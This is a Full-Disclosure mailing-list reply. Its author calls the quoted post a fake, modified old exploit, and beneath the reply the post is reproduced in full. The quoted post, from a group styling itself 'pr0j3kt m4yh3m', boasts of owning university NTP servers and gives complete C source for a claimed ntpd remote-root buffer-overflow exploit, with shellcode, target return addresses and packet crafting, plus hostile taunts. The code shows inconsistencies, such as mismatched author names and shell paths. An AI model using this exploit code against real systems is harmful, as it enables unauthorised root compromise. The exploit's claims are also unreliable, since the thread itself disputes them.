omfg i hope it isn't marcos flavio who invented that shit again (it's 100% an old, modified exploit and a fake site) or get a fucking brain man!
http://downloads.securityfocus.com/vulnerabilities/exploits/ntpd-exp.c > > > We are a cell of pr0j3kt m4yh3m in Latin America and western Europe. > We have owned many research centers in Latin America, for example the > ntp server at Observatorio Nacional, USP and UFRJ, in Brazil, home of our > member > ronaldinh0 and in many european universities,specially those ones knownby > their > high-profile computer science departments That's all. Keep the fucking > pr0j3kt m4yh3m > alive. Don't be confused by the evil words of > the CISSPs and white hats. > > <-->ntpd_stack_evasion.c<--> > /* ntpd remote root no-exec stack evasion spl0it > * by m0sk0v > * > * Ntpd is time protocol most used in *nix distros. > * > * Due to a buffer overflow in dump_srv.c is possible to execute > * arbitrary code in remote host by setting "HUG=" variable > * upon time protocol. > * > * This works even on stack protection using heap to > * alock data > * > * 0day!!!!! > * 0day!!!!! > * 0day!!!!! > * 0day!!!!! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * PRIVATE! DONT LEAK THIS EXPLOIT! > * > * > * Gr33tZ to : > * Marcos Flavio Assuncao (defhack.com), Denny Roger/www.batori.com.br > (thx for > * the shellcode, buddy!), ACME Security (www.acmesecurity.org), ksh > * > * [m0sk0v_at_cipsko m0sk0v]$ ./ntpd_stack_evasion.c -t2 localhost > * ntpd_stack_evasion.c by m0sk0v > * > * Selected platform: RedHat Linux 9.0 with ntpd 4.0.99k-RPM (/tmp/sh) > * > * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query > * [1] <- evil query (pkt = 512 | shell = 45) > * [2] <- null query (pkt = 12) > * /tmp/sh was hacked. 
> * [m0sk0v_at_cipsko m0sk0v]$ ls -al /tmp/suid-shell > * -rwsr-xr-x 1 root bin 512540 Aug 22 2005 /tmp/suid-shell > * > */ > > #include <stdio.h> > #include <stdlib.h > > #include <stdarg.h> > #include <string.h> > #include <sys/types.h> > #include <sys/socket.h> > #include <netinet/in.h> > #include <netdb.h> > #include <unistd.h> > #include <arpa/inet.h> > > #define NOP 0x90 > #define ADDRS 8 > #define PKTSIZ 512 > > static char usage[] = "Use: ntpd_stack_evasion.c [-o offset] <-t type> > <hostname>"; > > /* generic execve() shellcodes */ > > char lin_execve[] = > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" > > "\x80\xe8\xdc\xff\xff\xff/tmp/sh"; > > char bsd_execve[] = > /* specially made by denny_at_batori.com.br for ntpd_stack_evasion.c by > m0sk0v */ > /* thanks for that, buddy! */ > "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" > "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" > "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/suid-shell\x01\x01" > > "\x01\x01\x02\x02\x02\x02\x03\x00\x03\x03\x03\x9a\x04\x04\x04\x07\x04"; > > struct platforms > { > char *os; > char *version; > char *code; > long ret; > int align; > int shalign; > int port; > }; > > > struct platforms targ[] = > { > { "FreeBSD 5.4-STABLE", "4.0.99k (/tmp/suid-shell)", bsd_execve, > 0xbfbff8bc, 200, 220, 0 }, > > { "FreeBSD 5.4-STABLE", "4.0.99k (/tmp/suid-shell)", bsd_execve, > 0xbfbff540, 200, 220, 0 }, > > { "RedHat Linux 9.0", "4.0.99k-RPM (/tmp/suid-shell)", lin_execve, > 0xbffff777, 240, 160, 0 }, > > { NULL, NULL, NULL, 0x0, 0, 0, 0 } > }; > > long getip(name) > char *name; > { > struct hostent *hp; > long ip; > extern int h_errno; > > if ((ip = inet_addr(name)) < 0) > { > if (!(hp = gethostbyname(name))) > { > fprintf(stderr, "gethostbyname(): %s\n", > strerror(h_errno)); > exit(1); > } > memcpy(&ip, (hp->h_addr), 4); > } > > return ip; > } > > int 
doquery(host, ret, shellcode, align, shalign) > char *host, *shellcode; > long ret; > int align, shalign; > { > /* tcpdump-based reverse engineering :)) */ > > char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61, > 0x74, 0x75, 0x6d, 0x3d }; > > char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00 }; > > char buf[PKTSIZ], *p; > long *ap; > int i; > > int sockfd; > struct sockaddr_in sa; > > bzero(&sa, sizeof(sa)); > > sa.sin_family = AF_INET; > sa.sin_port = htons(123); > sa.sin_addr.s_addr = getip(host); > > if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) > { > perror("socket"); > return -1; > } > > if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0) > { > perror("connect"); > close(sockfd); > return -1; > } > > memset(buf, NOP, PKTSIZ); > memcpy(buf, q2, sizeof(q2)); > > p = buf + align; > ap = (unsigned long *)p; > > for(i=0;i<ADDRS/4;i++) > *ap++ = ret; > > p = (char *)ap; > > memcpy(buf+shalign, shellcode, strlen(shellcode)); > > if((write(sockfd, buf, PKTSIZ)) < 0) > { > perror("write"); > close(sockfd); > return -1; > } > > fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ, > strlen(shellcode)); > fflush(stderr); > > if ((write(sockfd, q3, sizeof(q3))) < 0) > { > perror("write"); > close(sockfd); > return -1; > } > > fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3)); > fflush(stderr); > > close(sockfd); > > return 0; > } > > int main(argc, argv) > int argc; > char **argv; > { > extern int optind, opterr; > extern char *optarg; > int ch, type, ofs, i; > long ret; > > opterr = ofs = 0; > type = -1; > > while ((ch = getopt(argc, argv, "t:o:")) != -1) > switch((char)ch) > { > case 't': > type = atoi(optarg); > break; > > case 'o': > ofs = atoi(optarg); > break; > > case '?': > default: > puts(usage); > exit(0); > > } > > argc -= optind; > argv += optind; > > fprintf(stderr, "ntpd_stack_evasion.c by m0sk1t0\n\n"); > > if (type < 
0) > { > fprintf(stderr, "Please select platform:\n"); > for (i=0;targ[i].os;i++) > { > fprintf(stderr, "\t-t %d : %s %s (%p)\n", i, > targ[i].os, targ[i].version, (void *)targ[i].ret); > } > > exit(0); > } > > fprintf(stderr, "Selected platform: %s with ntpd %s\n\n", > targ[type].os, targ[type].version); > > ret = targ[type].ret; > ret += ofs; > > if (argc != 1) > { > puts(usage); > exit(0); > } > > fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending > query\n", > (void *)ret, targ[type].align, targ[type].shalign); > > if (doquery(*argv, ret, targ[type].code, targ[type].align, > targ[type].shalign) < 0) > { > fprintf(stderr, "Failed.\n"); > exit(1); > } > > fprintf(stderr, "Done.\n"); > > if (!targ[type].port) > { > fprintf(stderr, "/tmp/suid-shell was hacked.\n"); > exit(0); > } > > exit(0); > } > <-->ntpd_stack_evasion.c<--> > > Thanks to Denny Roger @ Batori Software for his support > > -- > bitwarz Security Team !bST > http://bitwarz.narod.ru > > # Save a bug, kill a white hat! > > > -- > bitwarz Security Team !bST > http://bitwarz.narod.ru > > # Save a bug, kill a white hat! > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
